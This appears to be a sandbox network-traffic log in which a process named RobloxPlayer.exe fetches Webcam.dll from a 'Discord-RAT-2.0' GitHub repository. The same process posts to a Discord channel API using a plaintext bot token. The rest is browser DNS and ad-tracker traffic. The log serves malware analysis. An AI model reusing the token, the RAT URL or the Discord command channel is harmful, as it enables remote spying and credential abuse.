ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud

IN A

3.75.62.37
DNS

id5-sync.com

firefox.exe

Remote address:

8.8.8.8:53

Request

id5-sync.com

IN A

Response

id5-sync.com

IN A

162.19.138.83

id5-sync.com

IN A

162.19.138.118

id5-sync.com

IN A

141.95.98.65

id5-sync.com

IN A

162.19.138.116

id5-sync.com

IN A

141.95.98.64

id5-sync.com

IN A

162.19.138.119

id5-sync.com

IN A

141.95.33.120

id5-sync.com

IN A

162.19.138.120

id5-sync.com

IN A

162.19.138.117

id5-sync.com

IN A

162.19.138.82
DNS

api.rlcdn.com

firefox.exe

Remote address:

8.8.8.8:53

Request

api.rlcdn.com

IN A

Response

api.rlcdn.com

IN A

34.120.133.55
DNS

ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud

firefox.exe

Remote address:

8.8.8.8:53

Request

ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud

IN AAAA

Response
DNS

gum.nl3.vip.prod.criteo.com

firefox.exe

Remote address:

8.8.8.8:53

Request

gum.nl3.vip.prod.criteo.com

IN A

Response

gum.nl3.vip.prod.criteo.com

IN A

178.250.1.11
DNS

id5-sync.com

firefox.exe

Remote address:

8.8.8.8:53

Request

id5-sync.com

IN A

Response

id5-sync.com

IN A

162.19.138.83

id5-sync.com

IN A

162.19.138.118

id5-sync.com

IN A

141.95.98.65

id5-sync.com

IN A

162.19.138.116

id5-sync.com

IN A

141.95.98.64

id5-sync.com

IN A

162.19.138.119

id5-sync.com

IN A

141.95.33.120

id5-sync.com

IN A

162.19.138.120

id5-sync.com

IN A

162.19.138.117

id5-sync.com

IN A

162.19.138.82
DNS

idx.liadm.com

firefox.exe

Remote address:

8.8.8.8:53

Request

idx.liadm.com

IN A

Response

idx.liadm.com

IN CNAME

idx.cph.liveintent.com

idx.cph.liveintent.com

IN A

44.197.96.190

idx.cph.liveintent.com

IN A

184.73.49.33

idx.cph.liveintent.com

IN A

34.227.198.57

idx.cph.liveintent.com

IN A

3.211.31.230

idx.cph.liveintent.com

IN A

52.203.33.12

idx.cph.liveintent.com

IN A

3.223.221.123

idx.cph.liveintent.com

IN A

44.215.81.90

idx.cph.liveintent.com

IN A

18.210.125.214
DNS

gum.nl3.vip.prod.criteo.com

firefox.exe

Remote address:

8.8.8.8:53

Request

gum.nl3.vip.prod.criteo.com

IN AAAA

Response

gum.nl3.vip.prod.criteo.com

IN AAAA

2a02:2638:3::c
DNS

id5-sync.com

firefox.exe

Remote address:

8.8.8.8:53

Request

id5-sync.com

IN AAAA

Response
DNS

api.rlcdn.com

firefox.exe

Remote address:

8.8.8.8:53

Request

api.rlcdn.com

IN A

Response

api.rlcdn.com

IN A

34.120.133.55
DNS

match.adsrvr.org

firefox.exe

Remote address:

8.8.8.8:53

Request

match.adsrvr.org

IN A

Response

match.adsrvr.org

IN A

52.223.40.198

match.adsrvr.org

IN A

35.71.131.137

match.adsrvr.org

IN A

15.197.193.217

match.adsrvr.org

IN A

3.33.220.150
DNS

idx.cph.liveintent.com

firefox.exe

Remote address:

8.8.8.8:53

Request

idx.cph.liveintent.com

IN A

Response

idx.cph.liveintent.com

IN A

34.227.198.57

idx.cph.liveintent.com

IN A

3.211.31.230

idx.cph.liveintent.com

IN A

44.197.96.190

idx.cph.liveintent.com

IN A

44.215.170.75

idx.cph.liveintent.com

IN A

3.223.221.123

idx.cph.liveintent.com

IN A

52.203.33.12

idx.cph.liveintent.com

IN A

18.210.125.214

idx.cph.liveintent.com

IN A

184.73.49.33
DNS

match.adsrvr.org

firefox.exe

Remote address:

8.8.8.8:53

Request

match.adsrvr.org

IN A

Response

match.adsrvr.org

IN A

52.223.40.198

match.adsrvr.org

IN A

35.71.131.137

match.adsrvr.org

IN A

15.197.193.217

match.adsrvr.org

IN A

3.33.220.150
DNS

idx.cph.liveintent.com

firefox.exe

Remote address:

8.8.8.8:53

Request

idx.cph.liveintent.com

IN AAAA

Response
DNS

match.adsrvr.org

firefox.exe

Remote address:

8.8.8.8:53

Request

match.adsrvr.org

IN AAAA

Response
DNS

a.ad.gt

firefox.exe

Remote address:

8.8.8.8:53

Request

a.ad.gt

IN A

Response

a.ad.gt

IN CNAME

a.ad.gt.cdn.cloudflare.net

a.ad.gt.cdn.cloudflare.net

IN A

172.67.23.234

a.ad.gt.cdn.cloudflare.net

IN A

104.22.4.69

a.ad.gt.cdn.cloudflare.net

IN A

104.22.5.69
DNS

ad-delivery.net

firefox.exe

Remote address:

8.8.8.8:53

Request

ad-delivery.net

IN A

Response

ad-delivery.net

IN A

104.26.2.70

ad-delivery.net

IN A

172.67.69.19

ad-delivery.net

IN A

104.26.3.70
DNS

a.ad.gt.cdn.cloudflare.net

firefox.exe

Remote address:

8.8.8.8:53

Request

a.ad.gt.cdn.cloudflare.net

IN A

Response

a.ad.gt.cdn.cloudflare.net

IN A

172.67.23.234

a.ad.gt.cdn.cloudflare.net

IN A

104.22.4.69

a.ad.gt.cdn.cloudflare.net

IN A

104.22.5.69
DNS

ad-delivery.net

firefox.exe

Remote address:

8.8.8.8:53

Request

ad-delivery.net

IN A

Response

ad-delivery.net

IN A

104.26.2.70

ad-delivery.net

IN A

172.67.69.19

ad-delivery.net

IN A

104.26.3.70
DNS

a.ad.gt.cdn.cloudflare.net

firefox.exe

Remote address:

8.8.8.8:53

Request

a.ad.gt.cdn.cloudflare.net

IN AAAA

Response

a.ad.gt.cdn.cloudflare.net

IN AAAA

2606:4700:10::6816:545

a.ad.gt.cdn.cloudflare.net

IN AAAA

2606:4700:10::ac43:17ea

a.ad.gt.cdn.cloudflare.net

IN AAAA

2606:4700:10::6816:445
DNS

api.btloader.com

firefox.exe

Remote address:

8.8.8.8:53

Request

api.btloader.com

IN A

Response

api.btloader.com

IN A

130.211.23.194
DNS

ad-delivery.net

firefox.exe

Remote address:

8.8.8.8:53

Request

ad-delivery.net

IN AAAA

Response

ad-delivery.net

IN AAAA

2606:4700:20::ac43:4513

ad-delivery.net

IN AAAA

2606:4700:20::681a:346

ad-delivery.net

IN AAAA

2606:4700:20::681a:246
DNS

api.btloader.com

firefox.exe

Remote address:

8.8.8.8:53

Request

api.btloader.com

IN A

Response

api.btloader.com

IN A

130.211.23.194
DNS

api.btloader.com

firefox.exe

Remote address:

8.8.8.8:53

Request

api.btloader.com

IN AAAA

Response
DNS

c.pub.network

firefox.exe

Remote address:

8.8.8.8:53

Request

c.pub.network

IN A

Response

c.pub.network

IN A

34.160.152.31
DNS

c.pub.network

firefox.exe

Remote address:

8.8.8.8:53

Request

c.pub.network

IN A

Response

c.pub.network

IN A

34.160.152.31
DNS

c.pub.network

firefox.exe

Remote address:

8.8.8.8:53

Request

c.pub.network

IN AAAA

Response
GET

https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll

RobloxPlayer.exe

Remote address:

185.199.109.133:443

Request

GET /moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll HTTP/1.1
Host: raw.githubusercontent.com

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 39936
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "f50f41ce6d31d22a2bffcc57235e46a4d7a05fb38896fd150333f34701eb4b56"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: AAC6:1F0707:132503:189C51:6652991F
Accept-Ranges: bytes
Date: Sun, 26 May 2024 02:06:23 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600058-LCY
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1716689183.484017,VS0,VE184
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 211ec2ea085eb29bd68bbc75193c47288d0d5554
Expires: Sun, 26 May 2024 02:11:23 GMT
Source-Age: 0
DNS

187.142.162.3.in-addr.arpa

Remote address:

8.8.8.8:53

Request

187.142.162.3.in-addr.arpa

IN PTR

Response

187.142.162.3.in-addr.arpa

IN PTR

server-3-162-142-187dub56r cloudfrontnet
GET

https://a.ad.gt/api/v1/u/matches/474?_it=freestar

firefox.exe

Remote address:

172.67.23.234:443

Request

GET /api/v1/u/matches/474?_it=freestar HTTP/2.0
host: a.ad.gt
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:23 GMT
content-type: application/javascript
cross-origin-resource-policy: cross-origin
content-encoding: gzip
last-modified: Sun, 26 May 2024 01:57:38 GMT
cache-control: max-age=14400
cf-cache-status: HIT
age: 273
vary: Accept-Encoding
server: cloudflare
cf-ray: 889a34a7ae3e9442-LHR
GET

https://btloader.com/websiteconfig?bt_env=prod&o=5714937848528896&w=se7ensins.com

firefox.exe

Remote address:

104.22.75.216:443

Request

GET /websiteconfig?bt_env=prod&o=5714937848528896&w=se7ensins.com HTTP/2.0
host: btloader.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:24 GMT
content-type: application/json
content-length: 386
access-control-allow-origin: *
cache-control: public, max-age=300, must-revalidate, stale-if-error=3600, stale-while-revalidate=300
content-encoding: gzip
etag: "3f55e9be22a540a70507d61722013bb6"
last-modified: Sun, 26 May 2024 02:05:49 GMT
vary: Origin
via: 1.1 google
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 889a34a7fd919717-AMS
GET

https://ad-delivery.net/px.gif?ch=2

firefox.exe

Remote address:

104.26.2.70:443

Request

GET /px.gif?ch=2 HTTP/2.0
host: ad-delivery.net
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:24 GMT
content-type: image/gif
content-length: 43
x-goog-generation: 1620242732037093
x-goog-metageneration: 5
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 43
x-goog-hash: crc32c=cpEfJQ==
x-goog-hash: md5=rUsPYG4PhGW8TEwXCzfhow==
x-goog-storage-class: MULTI_REGIONAL
access-control-allow-origin: *
access-control-expose-headers: *, Content-Length, Date, Server, Transfer-Encoding, X-GUploader-UploadID, X-Google-Trace
x-guploader-uploadid: ABPtcPrJuYyhMHJjZVJxk_6124IDembaZI4-uDy5COW5JVgByQQDMUwUoiQ4ocSYcQlyYF_ll2hzKPYYOw
expires: Wed, 22 May 2024 13:01:18 GMT
cache-control: public, max-age=86400
age: 306443
last-modified: Wed, 05 May 2021 19:25:32 GMT
etag: "ad4b0f606e0f8465bc4c4c170b37e1a3"
cf-cache-status: HIT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PQxm8dSItZwgNis2cq2auItaKtJesU7JTVsZwLxccBRGbX8PuLGOrAooyLQvLYYqVzL4zac3k%2FHmWyGLOz9bH2SpjHm4%2FbOEqLUACuI2LUVxKXxyHvZW808mn2UVfMczig%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 889a34a81ec1250e-LHR
GET

https://ad-delivery.net/px.gif?ch=1&e=0.2469733343036421

firefox.exe

Remote address:

104.26.2.70:443

Request

GET /px.gif?ch=1&e=0.2469733343036421 HTTP/2.0
host: ad-delivery.net
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:27 GMT
content-type: image/gif
content-length: 43
x-goog-generation: 1620242732037093
x-goog-metageneration: 5
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 43
x-goog-hash: crc32c=cpEfJQ==
x-goog-hash: md5=rUsPYG4PhGW8TEwXCzfhow==
x-goog-storage-class: MULTI_REGIONAL
access-control-allow-origin: *
access-control-expose-headers: *, Content-Length, Date, Server, Transfer-Encoding, X-GUploader-UploadID, X-Google-Trace
x-guploader-uploadid: ABPtcPrJuYyhMHJjZVJxk_6124IDembaZI4-uDy5COW5JVgByQQDMUwUoiQ4ocSYcQlyYF_ll2hzKPYYOw
expires: Wed, 22 May 2024 13:01:18 GMT
cache-control: public, max-age=86400
age: 306446
last-modified: Wed, 05 May 2021 19:25:32 GMT
etag: "ad4b0f606e0f8465bc4c4c170b37e1a3"
cf-cache-status: HIT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qpmgjfyUJz1lE9Nnq7F0ShMiQHDyFaq8%2FN0iG3aLnmyx52gEWnW5SfVeS4mk7PGcyk%2Bg8N2JErshjF%2BAl1OU0uiGfhRnmcX1FrD48cIAs2ybwa9JStDwoqjgJo2cb8R6vw%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 889a34bb9f31250e-LHR
DNS

config.aps.amazon-adsystem.com

firefox.exe

Remote address:

8.8.8.8:53

Request

config.aps.amazon-adsystem.com

IN A

Response

config.aps.amazon-adsystem.com

IN A

18.66.171.125

config.aps.amazon-adsystem.com

IN A

18.66.171.56

config.aps.amazon-adsystem.com

IN A

18.66.171.5

config.aps.amazon-adsystem.com

IN A

18.66.171.49
DNS

config.aps.amazon-adsystem.com

firefox.exe

Remote address:

8.8.8.8:53

Request

config.aps.amazon-adsystem.com

IN A

Response

config.aps.amazon-adsystem.com

IN A

18.66.171.49

config.aps.amazon-adsystem.com

IN A

18.66.171.125

config.aps.amazon-adsystem.com

IN A

18.66.171.5

config.aps.amazon-adsystem.com

IN A

18.66.171.56
POST

https://discord.com/api/v9/channels/1244109081116151869/messages

RobloxPlayer.exe

Remote address:

162.159.137.232:443

Request

POST /api/v9/channels/1244109081116151869/messages HTTP/1.1
authorization: Bot MTIxNTQyMjc0OTk4ODg4NDU3Mg.G8QiY3.e2k047pCmhPxBH-tdaOfxVTB1BY3dSfZIT_sXY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sun, 26 May 2024 02:06:24 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=8de2a6f61b0411ef99e1c672566fb0d5; Expires=Fri, 25-May-2029 02:06:24 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1716689185.546
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uD%2FuVp0ry3%2BNwkJvM%2BuwJruoDKeHhH2MtuGv0jRvgY2GJjLyYbqXrfNeoo%2BQ160m33VttaM%2Fdw5USQwOlvSLJKeMFCYC8u5CvCQUDTSj%2FyuhYFFloTxorNFPRHgH"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=8de2a6f61b0411ef99e1c672566fb0d5eb43fcdb60f0331c1961dfdb51eadea5a2a1f09165b326a9e800e7d1c0733c9a; Expires=Fri, 25-May-2029 02:06:24 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=9f32403e1b2ac2e942c373193927369fd9a366ee-1716689184; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=hI84zKJbqqpbyYMgo2.8d_C35puBgEy6.TR2drFsksc-1716689184649-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 889a34a9984360f0-LHR
DNS

config.aps.amazon-adsystem.com

firefox.exe

Remote address:

8.8.8.8:53

Request

config.aps.amazon-adsystem.com

IN AAAA

Response
GET

https://ups.analytics.yahoo.com/ups/58657/fed?v=1&1p=0&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&us_privacy=1---&url=https://www.se7ensins.com/forums/threads/how-to-tell-if-youve-been-ratted.470346/&pixelId=58657

firefox.exe

Remote address:

3.75.62.37:443

Request

GET /ups/58657/fed?v=1&1p=0&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&us_privacy=1---&url=https://www.se7ensins.com/forums/threads/how-to-tell-if-youve-been-ratted.470346/&pixelId=58657 HTTP/2.0
host: ups.analytics.yahoo.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: text/plain
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers
GET

https://ups.analytics.yahoo.com/ups/58827/sync?redir=true&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gpp=&gpp_sid=

firefox.exe

Remote address:

3.75.62.37:443

Request

GET /ups/58827/sync?redir=true&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA